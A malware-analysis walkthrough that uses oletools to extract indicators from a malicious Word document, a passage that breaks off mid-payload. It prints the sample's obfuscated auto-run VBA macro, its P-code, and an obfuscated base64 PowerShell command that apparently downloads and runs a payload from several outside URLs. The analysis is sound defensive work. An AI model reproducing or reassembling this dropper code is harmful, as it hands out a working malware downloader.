Analyze artifacts to extract IOCs

Having a brief overview of the sample artifact first:

$ file sample.bin
 
sample.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jul 23 00:12:00 2020, Last Saved Time/Date: Thu Jul 23 00:12:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0

The file provided is a Microsoft Office document stored in the Compound File Binary (CFB) format, a widely used structure for Office files.

The Compound File Binary (CFB) file format is used for storing storage objects and stream objects in a hierarchical structure within a single file.

Extracting Macro

This part involves using oletools to analyze the streams within the CFB format.

oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.

$ oleid sample.bin
 
Filename: sample.bin
 
--------------------+--------------------+----------+--------------------------
Indicator           |Value               |Risk      |Description
--------------------+--------------------+----------+--------------------------
File format         |MS Word 97-2003     |info      |
                    |Document or Template|          |
--------------------+--------------------+----------+--------------------------
Container format    |OLE                 |info      |Container type
--------------------+--------------------+----------+--------------------------
Application name    |Microsoft Office    |info      |Application name declared
                    |Word                |          |in properties
--------------------+--------------------+----------+--------------------------
Properties code page|1252: ANSI Latin 1; |info      |Code page used for
                    |Western European    |          |properties
                    |(Windows)           |          |
--------------------+--------------------+----------+--------------------------
Encrypted           |False               |none      |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros          |Yes, suspicious     |HIGH      |This file contains VBA
                    |                    |          |macros. Suspicious
                    |                    |          |keywords were found. Use
                    |                    |          |olevba and mraptor for
                    |                    |          |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros          |No                  |none      |This file does not contain
                    |                    |          |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External            |0                   |none      |External relationships
Relationships       |                    |          |such as remote templates,
                    |                    |          |remote OLE objects, etc
--------------------+--------------------+----------+--------------------------

Found suspicious behavior in VBA Macros, using olevba to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML). However, due to the amount of output information, I will put it in an expandable callout:

olevba output

olevba sample.bin
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.2 on Python 3.13.3 - http://decalage.info/python/oletools
===============================================================================
FILE: sample.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO diakzouxchouz.cls
in file: sample.bin - OLE stream: 'Macros/VBA/diakzouxchouz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub _
Document_open()
boaxvoebxiotqueb
End Sub
 
-------------------------------------------------------------------------------
VBA MACRO roubhaol.frm
in file: sample.bin - OLE stream: 'Macros/VBA/roubhaol'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO govwiahtoozfaid.bas
in file: sample.bin - OLE stream: 'Macros/VBA/govwiahtoozfaid'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function boaxvoebxiotqueb()
gooykadheoj = Chr(roubhaol.Zoom + Int(5 * 3))
Dim c7ÓATOQe2Ëj As Integer
c7ÓATOQe2Ëj = 6
Do While c7ÓATOQe2Ëj < 6 + 2
c7ÓATOQe2Ëj = c7ÓATOQe2Ëj + 5: DoEvents
Loop
haothkoebtheil = "2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqw2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqin2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqm2342772g3&*gs7712ffvs626fqgm2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqt2342772g3&*gs7712ffvs626fq" + gooykadheoj + "2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fq:w2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqin2342772g3&*gs7712ffvs626fq322342772g3&*gs7712ffvs626fq_2342772g3&*gs7712ffvs626fq" + roubhaol.joefwoefcheaw + "2342772g3&*gs7712ffvs626fqr2342772g3&*gs7712ffvs626fqo2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqc2342772g3&*gs7712ffvs626fqes2342772g3&*gs7712ffvs626fqs2342772g3&*gs7712ffvs626fq"
Dim t0Á7ÖVhC As String
t0Á7ÖVhC = Replace$("NrsGblssw", "NrsGbl", "jeSyf")
deulsaocthuul = juuvzouchmiopxeox(haothkoebtheil)
Dim aboKTWBmOV As Variant
Set tiajriokchaoy = CreateObject(deulsaocthuul)
Dim Li2ÚJ8âfUTJJ As Boolean
deaknaugthein = roubhaol.kaizseah.ControlTipText
Dim Wmuaj As String
Wmuaj = Replace$("LqdFaWZRoPXoybkSqY", "LqdFaWZRoP", "nIEI6Ý")
giakfeiw = deulsaocthuul + gooykadheoj + roubhaol.paerwagyouqumeid.ControlTipText + deaknaugthein
Dim lgiLh7Ë As Object
queegthaen = giakfeiw + roubhaol.joefwoefcheaw
Dim FZV4ÇKPQ As Integer
FZV4ÇKPQ = 4
Do While FZV4ÇKPQ < 4 + 5
FZV4ÇKPQ = FZV4ÇKPQ + 3: DoEvents
Loop
Set deavjoajsear = luumlaud(queegthaen)
Dim kRpYwyW As String
kRpYwyW = Replace$("f4åL5åJqZNvlk", "f4åL5åJ", "TFRkfTygd")
xve = Array _
("1234444123", tiajriokchaoy. _
Create(geulgelquuuj, kaenhaig, deavjoajsear), "9938723")
Dim C0ÄjVh As Integer
C0ÄjVh = 9
Do While C0ÄjVh < 9 + 1
C0ÄjVh = C0ÄjVh + 1: DoEvents
Loop
End Function
Function juuvzouchmiopxeox(yiajthoavheiw)
geutyoeytiestheug = yiajthoavheiw
Dim QSuRcu As Currency
feaxgeip = Split(geutyoeytiestheug, "2342772g3&*gs7712ffvs626fq")
Dim J1Â8ÀXwEwAd As String
J1Â8ÀXwEwAd = Replace$("UBZIWrn7ÆJAPVmt", "UBZI", "hsvq")
jaquhoiqu = csqw + Join(feaxgeip, eihnx)
Dim gBv As Object
juuvzouchmiopxeox = jaquhoiqu
Dim lqsqsHrCH As Boolean
End Function
Function geulgelquuuj()
sjiqw = roubhaol.gaoddaicsauktheb.Pages(10 / 10).ControlTipText
Dim ISXQDR As Integer
ISXQDR = 2
Do While ISXQDR < 2 + 7
ISXQDR = ISXQDR + 9: DoEvents
Loop
geulgelquuuj = juuvzouchmiopxeox(sjiqw)
Dim kbqvO4Ä7Çr As Byte
End Function
Function luumlaud(zeolkaepxoag)
Set luumlaud = CreateObject(zeolkaepxoag)
Dim vPu As String
vPu = Replace$("BenqV1áigVwifwdQq", "BenqV1ái", "on5Â")
luumlaud _
. _
showwindow = (mujgoiy + jioyseertioch) + (neivberziok + xuajroegquoudcaij)
Dim osWIUnikOk As String
osWIUnikOk = Replace$("cLwhWVLMDSQFh3ÔT7É", "cLwhWVLMDS", "AvYXNNS")
End Function
 
-------------------------------------------------------------------------------
VBA MACRO VBA_P-code.txt
in file: VBA P-code - OLE stream: 'VBA P-code'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Processing file: sample.bin
' ===============================================================================
' Module streams:
' Macros/VBA/diakzouxchouz - 1367 bytes
' Line #0:
' 	LineCont 0x0004 02 00 00 00
' 	FuncDefn (Sub diakzouxchouz())
' Line #1:
' 	ArgsCall Document_open 0x0000
' Line #2:
' 	EndSub
' Line #3:
' Macros/VBA/roubhaol - 1187 bytes
' Macros/VBA/govwiahtoozfaid - 5705 bytes
' Line #0:
' 	FuncDefn (Function Document_open())
' Line #1:
' 	Ld roubhaol
' 	MemLd Chr
' 	LitDI2 0x0005
' 	LitDI2 0x0003
' 	Mul
' 	FnInt
' 	Add
' 	ArgsLd gooykadheoj 0x0001
' 	St govwiahtoozfaid
' Line #2:
' 	Dim
' 	VarDefn Zoom (As Integer)
' Line #3:
' 	LitDI2 0x0006
' 	St Zoom
' Line #4:
' 	Ld Zoom
' 	LitDI2 0x0006
' 	LitDI2 0x0002
' 	Add
' 	Lt
' 	DoWhile
' Line #5:
' 	Ld Zoom
' 	LitDI2 0x0005
' 	Add
' 	St Zoom
' 	BoS 0x0000
' 	ArgsCall DoEvents 0x0000
' Line #6:
' 	Loop
' Line #7:
' 	LitStr 0x010B "2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqw2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqin2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqm2342772g3&*gs7712ffvs626fqgm2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqt2342772g3&*gs7712ffvs626fq"
' 	Ld govwiahtoozfaid
' 	Add
' 	LitStr 0x00BD "2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fq:w2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqin2342772g3&*gs7712ffvs626fq322342772g3&*gs7712ffvs626fq_2342772g3&*gs7712ffvs626fq"
' 	Add
' 	Ld roubhaol
' 	MemLd haothkoebtheil
' 	Add
' 	LitStr 0x00BC "2342772g3&*gs7712ffvs626fqr2342772g3&*gs7712ffvs626fqo2342772g3&*gs7712ffvs626fq2342772g3&*gs7712ffvs626fqc2342772g3&*gs7712ffvs626fqes2342772g3&*gs7712ffvs626fqs2342772g3&*gs7712ffvs626fq"
' 	Add
' 	St c7ÓATOQe2Ëj
' Line #8:
' 	Dim
' 	VarDefn joefwoefcheaw (As String)
' Line #9:
' 	LitStr 0x0009 "NrsGblssw"
' 	LitStr 0x0006 "NrsGbl"
' 	LitStr 0x0005 "jeSyf"
' 	ArgsLd t0Á7ÖVhC$ 0x0003
' 	St joefwoefcheaw
' Line #10:
' 	Ld c7ÓATOQe2Ëj
' 	ArgsLd deulsaocthuul 0x0001
' 	St Replace
' Line #11:
' 	Dim
' 	VarDefn juuvzouchmiopxeox (As Variant)
' Line #12:
' 	SetStmt
' 	Ld Replace
' 	ArgsLd tiajriokchaoy 0x0001
' 	Set aboKTWBmOV
' Line #13:
' 	Dim
' 	VarDefn CreateObject (As Boolean)
' Line #14:
' 	Ld roubhaol
' 	MemLd deaknaugthein
' 	MemLd ControlTipText
' 	St Li2ÚJ8âfUTJJ
' Line #15:
' 	Dim
' 	VarDefn kaizseah (As String)
' Line #16:
' 	LitStr 0x0012 "LqdFaWZRoPXoybkSqY"
' 	LitStr 0x000A "LqdFaWZRoP"
' 	LitStr 0x0006 "nIEI6Ý"
' 	ArgsLd t0Á7ÖVhC$ 0x0003
' 	St kaizseah
' Line #17:
' 	Ld Replace
' 	Ld govwiahtoozfaid
' 	Add
' 	Ld roubhaol
' 	MemLd giakfeiw
' 	MemLd ControlTipText
' 	Add
' 	Ld Li2ÚJ8âfUTJJ
' 	Add
' 	St Wmuaj
' Line #18:
' 	Dim
' 	VarDefn paerwagyouqumeid (As Object)
' Line #19:
' 	Ld Wmuaj
' 	Ld roubhaol
' 	MemLd haothkoebtheil
' 	Add
' 	St lgiLh7Ë
' Line #20:
' 	Dim
' 	VarDefn queegthaen (As Integer)
' Line #21:
' 	LitDI2 0x0004
' 	St queegthaen
' Line #22:
' 	Ld queegthaen
' 	LitDI2 0x0004
' 	LitDI2 0x0005
' 	Add
' 	Lt
' 	DoWhile
' Line #23:
' 	Ld queegthaen
' 	LitDI2 0x0003
' 	Add
' 	St queegthaen
' 	BoS 0x0000
' 	ArgsCall DoEvents 0x0000
' Line #24:
' 	Loop
' Line #25:
' 	SetStmt
' 	Ld lgiLh7Ë
' 	ArgsLd deavjoajsear 0x0001
' 	Set FZV4ÇKPQ
' Line #26:
' 	Dim
' 	VarDefn luumlaud (As String)
' Line #27:
' 	LitStr 0x000D "f4åL5åJqZNvlk"
' 	LitStr 0x0007 "f4åL5åJ"
' 	LitStr 0x0009 "TFRkfTygd"
' 	ArgsLd t0Á7ÖVhC$ 0x0003
' 	St luumlaud
' Line #28:
' 	LineCont 0x0008 03 00 00 00 08 00 00 00
' 	LitStr 0x000A "1234444123"
' 	Ld Create
' 	Ld geulgelquuuj
' 	Ld FZV4ÇKPQ
' 	Ld aboKTWBmOV
' 	ArgsMemLd xve 0x0003
' 	LitStr 0x0007 "9938723"
' 	ArgsArray Array 0x0003
' 	St kRpYwyW
' Line #29:
' 	Dim
' 	VarDefn kaenhaig (As Integer)
' Line #30:
' 	LitDI2 0x0009
' 	St kaenhaig
' Line #31:
' 	Ld kaenhaig
' 	LitDI2 0x0009
' 	LitDI2 0x0001
' 	Add
' 	Lt
' 	DoWhile
' Line #32:
' 	Ld kaenhaig
' 	LitDI2 0x0001
' 	Add
' 	St kaenhaig
' 	BoS 0x0000
' 	ArgsCall DoEvents 0x0000
' Line #33:
' 	Loop
' Line #34:
' 	EndFunc
' Line #35:
' 	FuncDefn (Function deulsaocthuul(C0ÄjVh))
' Line #36:
' 	Ld C0ÄjVh
' 	St yiajthoavheiw
' Line #37:
' 	Dim
' 	VarDefn geutyoeytiestheug (As Currency)
' Line #38:
' 	Ld yiajthoavheiw
' 	LitStr 0x001A "2342772g3&*gs7712ffvs626fq"
' 	ArgsLd feaxgeip 0x0002
' 	St QSuRcu
' Line #39:
' 	Dim
' 	VarDefn Split (As String)
' Line #40:
' 	LitStr 0x000F "UBZIWrn7ÆJAPVmt"
' 	LitStr 0x0004 "UBZI"
' 	LitStr 0x0004 "hsvq"
' 	ArgsLd t0Á7ÖVhC$ 0x0003
' 	St Split
' Line #41:
' 	Ld jaquhoiqu
' 	Ld QSuRcu
' 	Ld Join
' 	ArgsLd csqw 0x0002
' 	Add
' 	St J1Â8ÀXwEwAd
' Line #42:
' 	Dim
' 	VarDefn eihnx (As Object)
' Line #43:
' 	Ld J1Â8ÀXwEwAd
' 	St deulsaocthuul
' Line #44:
' 	Dim
' 	VarDefn gBv (As Boolean)
' Line #45:
' 	EndFunc
' Line #46:
' 	FuncDefn (Function Create())
' Line #47:
' 	LitDI2 0x000A
' 	LitDI2 0x000A
' 	Div
' 	Ld roubhaol
' 	MemLd gaoddaicsauktheb
' 	ArgsMemLd Pages 0x0001
' 	MemLd ControlTipText
' 	St lqsqsHrCH
' Line #48:
' 	Dim
' 	VarDefn sjiqw (As Integer)
' Line #49:
' 	LitDI2 0x0002
' 	St sjiqw
' Line #50:
' 	Ld sjiqw
' 	LitDI2 0x0002
' 	LitDI2 0x0007
' 	Add
' 	Lt
' 	DoWhile
' Line #51:
' 	Ld sjiqw
' 	LitDI2 0x0009
' 	Add
' 	St sjiqw
' 	BoS 0x0000
' 	ArgsCall DoEvents 0x0000
' Line #52:
' 	Loop
' Line #53:
' 	Ld lqsqsHrCH
' 	ArgsLd deulsaocthuul 0x0001
' 	St Create
' Line #54:
' 	Dim
' 	VarDefn ISXQDR (As Byte)
' Line #55:
' 	EndFunc
' Line #56:
' 	FuncDefn (Function deavjoajsear(kbqvO4Ä7Çr))
' Line #57:
' 	SetStmt
' 	Ld kbqvO4Ä7Çr
' 	ArgsLd tiajriokchaoy 0x0001
' 	Set deavjoajsear
' Line #58:
' 	Dim
' 	VarDefn zeolkaepxoag (As String)
' Line #59:
' 	LitStr 0x0011 "BenqV1áigVwifwdQq"
' 	LitStr 0x0008 "BenqV1ái"
' 	LitStr 0x0004 "on5Â"
' 	ArgsLd t0Á7ÖVhC$ 0x0003
' 	St zeolkaepxoag
' Line #60:
' 	LineCont 0x0008 01 00 00 00 02 00 00 00
' 	Ld showwindow
' 	Ld mujgoiy
' 	Add
' 	Paren
' 	Ld jioyseertioch
' 	Ld neivberziok
' 	Add
' 	Paren
' 	Add
' 	Ld deavjoajsear
' 	MemSt vPu
' Line #61:
' 	Dim
' 	VarDefn xuajroegquoudcaij (As String)
' Line #62:
' 	LitStr 0x0012 "cLwhWVLMDSQFh3ÔT7É"
' 	LitStr 0x000A "cLwhWVLMDS"
' 	LitStr 0x0007 "AvYXNNS"
' 	ArgsLd t0Á7ÖVhC$ 0x0003
' 	St xuajroegquoudcaij
' Line #63:
' 	EndFunc
' Line #64:
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
joopxof
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
caorfauxleir
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
foewdaibzian
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
yoewcheuypouc
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
duuhfeupniwboha
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
�Page1O3G
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
�Page2O3G
-------------------------------------------------------------------------------
VBA FORM STRING IN 'sample.bin' - OLE stream: 'Macros/roubhaol/i09/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
�p2342772g3&*gs7712ffvs626fqo2342772g3&*gs7712ffvs626fqw2342772g3&*gs7712ffvs626fqe2342772g3&*gs7712ffvs626fqr2342772g3&*gs7712ffvs626fqs2342772g3&*gs7712ffvs626fqh2342772g3&*gs7712ffvs626fqeL2342772g3&*gs7712ffvs626fqL2342772g3&*gs7712ffvs626fq 2342772g3&*gs7712ffvs626fq-2342772g3&*gs7712ffvs626fqe2342772g3&*gs7712ffvs626fq JABsAG2342772g3&*gs7712ffvs626fqkAZQBj2342772g3&*gs7712ffvs626fqAGgAcg2342772g3&*gs7712ffvs626fqBvAHUA2342772g3&*gs7712ffvs626fqaAB3AH2342772g3&*gs7712ffvs626fqUAdwA92342772g3&*gs7712ffvs626fqACcAdg2342772g3&*gs7712ffvs626fqB1AGEA2342772g3&*gs7712ffvs626fqYwBkAG2342772g3&*gs7712ffvs626fq8AdQB22342772g3&*gs7712ffvs626fqAGMAaQ2342772g3&*gs7712ffvs626fqBvAHgA2342772g3&*gs7712ffvs626fqaABhAG2342772g3&*gs7712ffvs626fq8AbAAn2342772g3&*gs7712ffvs626fqADsAWw2342772g3&*gs7712ffvs626fqBOAGUA2342772g3&*gs7712ffvs626fqdAAuAF2342772g3&*gs7712ffvs626fqMAZQBy2342772g3&*gs7712ffvs626fqAHYAaQ2342772g3&*gs7712ffvs626fqBjAGUA2342772g3&*gs7712ffvs626fqUABvAG2342772g3&*gs7712ffvs626fqkAbgB02342772g3&*gs7712ffvs626fqAE0AYQ2342772g3&*gs7712ffvs626fqBuAGEA2342772g3&*gs7712ffvs626fqZwBlAH2342772g3&*gs7712ffvs626fqIAXQA62342772g3&*gs7712ffvs626fqADoAIg2342772g3&*gs7712ffvs626fqBTAEUA2342772g3&*gs7712ffvs626fqYABjAH2342772g3&*gs7712ffvs626fqUAUgBp2342772g3&*gs7712ffvs626fqAFQAeQ2342772g3&*gs7712ffvs626fqBgAFAA2342772g3&*gs7712ffvs626fqUgBPAG2342772g3&*gs7712ffvs626fqAAVABv2342772g3&*gs7712ffvs626fqAEMAYA2342772g3&*gs7712ffvs626fqBvAGwA2342772g3&*gs7712ffvs626fqIgAgAD2342772g3&*gs7712ffvs626fq0AIAAn2342772g3&*gs7712ffvs626fqAHQAbA2342772g3&*gs7712ffvs626fqBzADEA2342772g3&*gs7712ffvs626fqMgAsAC2342772g3&*gs7712ffvs626fqAAdABs2342772g3&*gs7712ffvs626fqAHMAMQ2342772g3&*gs7712ffvs626fqAxACwA2342772g3&*gs7712ffvs626fqIAB0AG2342772g3&*gs7712ffvs626fqwAcwAn2342772g3&*gs7712ffvs626fqADsAJA2342772g3&*gs7712ffvs626fqBkAGUA2342772g3&*gs7712ffvs626fqaQBjAG2342772g3&*gs7712ffvs626fqgAYgBl2342772g3&*gs7712ffvs626fqAHUAZA2342772g3&*gs7712ffvs626fqByAGUA2342772g3&*gs7712ffvs626fqaQByAC2342772g3&*gs7712ffvs626fqAAPQAg2342772g3&*gs7712ffvs626fqACcAMw2342772g3&*gs7712ffvs626fqAzADcA2342772g3&*gs7712ffvs626fqJwA7AC2342772g3&*gs7712ffvs626fqQAcQB12342772g3&*gs7712ffvs626fqAG8AYQ2342772g3&*gs7712ffvs626fqBkAGcA2342772g3&*gs7712ffvs626fqbwBpAG2342772g3&*gs7712ffvs626fqoAdgBl2342772g3&*gs7712ffvs626fqAHUAbQ2342772g3&*gs7712ffvs626fqA9ACcA2342772g3&*gs7712ffvs626fqZAB1AH2342772g3&*gs7712ffvs626fqUAdgBt2342772g3&*gs7712ffvs626fqAG8AZQ2342772g3&*gs7712ffvs626fqB6AGgA2342772g3&*gs7712ffvs626fqYQBpAH2342772g3&*gs7712ffvs626fqQAZwBv2342772g3&*gs7712ffvs626fqAGgAJw2342772g3&*gs7712ffvs626fqA7ACQA2342772g3&*gs7712ffvs626fqdABvAG2342772g3&*gs7712ffvs626fqUAaABm2342772g3&*gs7712ffvs626fqAGUAdA2342772g3&*gs7712ffvs626fqBoAHgA2342772g3&*gs7712ffvs626fqbwBoAG2342772g3&*gs7712ffvs626fqIAYQBl2342772g3&*gs7712ffvs626fqAHkAPQ2342772g3&*gs7712ffvs626fqAkAGUA2342772g3&*gs7712ffvs626fqbgB2AD2342772g3&*gs7712ffvs626fqoAdQBz2342772g3&*gs7712ffvs626fqAGUAcg2342772g3&*gs7712ffvs626fqBwAHIA2342772g3&*gs7712ffvs626fqbwBmAG2342772g3&*gs7712ffvs626fqkAbABl2342772g3&*gs7712ffvs626fqACsAJw2342772g3&*gs7712ffvs626fqBcACcA2342772g3&*gs7712ffvs626fqKwAkAG2342772g3&*gs7712ffvs626fqQAZQBp2342772g3&*gs7712ffvs626fqAGMAaA2342772g3&*gs7712ffvs626fqBiAGUA2342772g3&*gs7712ffvs626fqdQBkAH2342772g3&*gs7712ffvs626fqIAZQBp2342772g3&*gs7712ffvs626fqAHIAKw2342772g3&*gs7712ffvs626fqAnAC4A2342772g3&*gs7712ffvs626fqZQB4AG2342772g3&*gs7712ffvs626fqUAJwA72342772g3&*gs7712ffvs626fqACQAcw2342772g3&*gs7712ffvs626fqBpAGUA2342772g3&*gs7712ffvs626fqbgB0AG2342772g3&*gs7712ffvs626fqUAZQBk2342772g3&*gs7712ffvs626fqAD0AJw2342772g3&*gs7712ffvs626fqBxAHUA2342772g3&*gs7712ffvs626fqYQBpAG2342772g3&*gs7712ffvs626fq4AcQB12342772g3&*gs7712ffvs626fqAGEAYw2342772g3&*gs7712ffvs626fqBoAGwA2342772g3&*gs7712ffvs626fqbwBhAH2342772g3&*gs7712ffvs626fqoAJwA72342772g3&*gs7712ffvs626fqACQAcg2342772g3&*gs7712ffvs626fqBlAHUA2342772g3&*gs7712ffvs626fqcwB0AG2342772g3&*gs7712ffvs626fqgAbwBh2342772g3&*gs7712ffvs626fqAHMAPQ2342772g3&*gs7712ffvs626fqAuACgA2342772g3&*gs7712ffvs626fqJwBuAC2342772g3&*gs7712ffvs626fqcAKwAn2342772g3&*gs7712ffvs626fqAGUAdw2342772g3&*gs7712ffvs626fqAtAG8A2342772g3&*gs7712ffvs626fqYgAnAC2342772g3&*gs7712ffvs626fqsAJwBq2342772g3&*gs7712ffvs626fqAGUAYw2342772g3&*gs7712ffvs626fqB0ACcA2342772g3&*gs7712ffvs626fqKQAgAG2342772g3&*gs7712ffvs626fq4ARQB02342772g3&*gs7712ffvs626fqAC4Adw2342772g3&*gs7712ffvs626fqBlAEIA2342772g3&*gs7712ffvs626fqYwBsAE2342772g3&*gs7712ffvs626fqkAZQBu2342772g3&*gs7712ffvs626fqAFQAOw2342772g3&*gs7712ffvs626fqAkAGoA2342772g3&*gs7712ffvs626fqYQBjAG2342772g3&*gs7712ffvs626fqwAZQBl2342772g3&*gs7712ffvs626fqAHcAeQ2342772g3&*gs7712ffvs626fqBpAHEA2342772g3&*gs7712ffvs626fqdQA9AC2342772g3&*gs7712ffvs626fqcAaAB02342772g3&*gs7712ffvs626fqAHQAcA2342772g3&*gs7712ffvs626fqBzADoA2342772g3&*gs7712ffvs626fqLwAvAG2342772g3&*gs7712ffvs626fqgAYQBv2342772g3&*gs7712ffvs626fqAHEAdQ2342772g3&*gs7712ffvs626fqBuAGsA2342772g3&*gs7712ffvs626fqbwBuAG2342772g3&*gs7712ffvs626fqcALgBj2342772g3&*gs7712ffvs626fqAG8AbQ2342772g3&*gs7712ffvs626fqAvAGIA2342772g3&*gs7712ffvs626fqbgAvAH2342772g3&*gs7712ffvs626fqMAOQB32342772g3&*gs7712ffvs626fqADQAdA2342772g3&*gs7712ffvs626fqBnAGMA2342772g3&*gs7712ffvs626fqagBsAF2342772g3&*gs7712ffvs626fq8AZgA22342772g3&*gs7712ffvs626fqADYANg2342772g3&*gs7712ffvs626fqA5AHUA2342772g3&*gs7712ffvs626fqZwB1AF2342772g3&*gs7712ffvs626fq8AdwA02342772g3&*gs7712ffvs626fqAGIAag2342772g3&*gs7712ffvs626fqAvACoA2342772g3&*gs7712ffvs626fqaAB0AH2342772g3&*gs7712ffvs626fqQAcABz2342772g3&*gs7712ffvs626fqADoALw2342772g3&*gs7712ffvs626fqAvAHcA2342772g3&*gs7712ffvs626fqdwB3AC2342772g3&*gs7712ffvs626fq4AdABl2342772g3&*gs7712ffvs626fqAGMAaA2342772g3&*gs7712ffvs626fqB0AHIA2342772g3&*gs7712ffvs626fqYQB2AG2342772g3&*gs7712ffvs626fqUAbAAu2342772g3&*gs7712ffvs626fqAGUAdg2342772g3&*gs7712ffvs626fqBlAG4A2342772g3&*gs7712ffvs626fqdABzAC2342772g3&*gs7712ffvs626fq8AaQBu2342772g3&*gs7712ffvs626fqAGYAbw2342772g3&*gs7712ffvs626fqByAG0A2342772g3&*gs7712ffvs626fqYQB0AG2342772g3&*gs7712ffvs626fqkAbwBu2342772g3&*gs7712ffvs626fqAGwALw2342772g3&*gs7712ffvs626fqA4AGwA2342772g3&*gs7712ffvs626fqcwBqAG2342772g3&*gs7712ffvs626fqgAcgBs2342772g3&*gs7712ffvs626fqADYAbg2342772g3&*gs7712ffvs626fqBuAGsA2342772g3&*gs7712ffvs626fqdwBnAH2342772g3&*gs7712ffvs626fqkAegBz2342772g3&*gs7712ffvs626fqAHUAZA2342772g3&*gs7712ffvs626fqB6AGEA2342772g3&*gs7712ffvs626fqbQBfAG2342772g3&*gs7712ffvs626fqgAMwB32342772g3&*gs7712ffvs626fqAG4AZw2342772g3&*gs7712ffvs626fqBfAGEA2342772g3&*gs7712ffvs626fqNgB2AD2342772g3&*gs7712ffvs626fqUALwAq2342772g3&*gs7712ffvs626fqAGgAdA2342772g3&*gs7712ffvs626fqB0AHAA2342772g3&*gs7712ffvs626fqOgAvAC2342772g3&*gs7712ffvs626fq8AZABp2342772g3&*gs7712ffvs626fqAGcAaQ2342772g3&*gs7712ffvs626fqB3AGUA2342772g3&*gs7712ffvs626fqYgBtAG2342772g3&*gs7712ffvs626fqEAcgBr2342772g3&*gs7712ffvs626fqAGUAdA2342772g3&*gs7712ffvs626fqBpAG4A2342772g3&*gs7712ffvs626fqZwAuAG2342772g3&*gs7712ffvs626fqMAbwBt2342772g3&*gs7712ffvs626fqAC8Adw2342772g3&*gs7712ffvs626fqBwAC0A2342772g3&*gs7712ffvs626fqYQBkAG2342772g3&*gs7712ffvs626fq0AaQBu2342772g3&*gs7712ffvs626fqAC8ANw2342772g3&*gs7712ffvs626fqAyAHQA2342772g3&*gs7712ffvs626fqMABqAG2342772g3&*gs7712ffvs626fqoAaABt2342772g3&*gs7712ffvs626fqAHYANw2342772g3&*gs7712ffvs626fqB0AGEA2342772g3&*gs7712ffvs626fqawB3AH2342772g3&*gs7712ffvs626fqYAaQBz2342772g3&*gs7712ffvs626fqAGYAbg2342772g3&*gs7712ffvs626fqB6AF8A2342772g3&*gs7712ffvs626fqZQBlAG2342772g3&*gs7712ffvs626fqoAdgBm2342772g3&*gs7712ffvs626fqAF8AaA2342772g3&*gs7712ffvs626fqA2AHYA2342772g3&*gs7712ffvs626fqMgBpAH2342772g3&*gs7712ffvs626fqgALwAq2342772g3&*gs7712ffvs626fqAGgAdA2342772g3&*gs7712ffvs626fqB0AHAA2342772g3&*gs7712ffvs626fqOgAvAC2342772g3&*gs7712ffvs626fq8AaABv2342772g3&*gs7712ffvs626fqAGwAZg2342772g3&*gs7712ffvs626fqB2AGUA2342772g3&*gs7712ffvs626fqLgBzAG2342772g3&*gs7712ffvs626fqUALwBp2342772g3&*gs7712ffvs626fqAG0AYQ2342772g3&*gs7712ffvs626fqBnAGUA2342772g3&*gs7712ffvs626fqcwAvAD2342772g3&*gs7712ffvs626fqEAYwBr2342772g3&*gs7712ffvs626fqAHcANQ2342772g3&*gs7712ffvs626fqBtAGoA2342772g3&*gs7712ffvs626fqNAA5AH2342772g3&*gs7712ffvs626fqcAXwAy2342772g3&*gs7712ffvs626fqAGsAMQ2342772g3&*gs7712ffvs626fqAxAHAA2342772g3&*gs7712ffvs626fqeABfAG2342772g3&*gs7712ffvs626fqQALwAq2342772g3&*gs7712ffvs626fqAGgAdA2342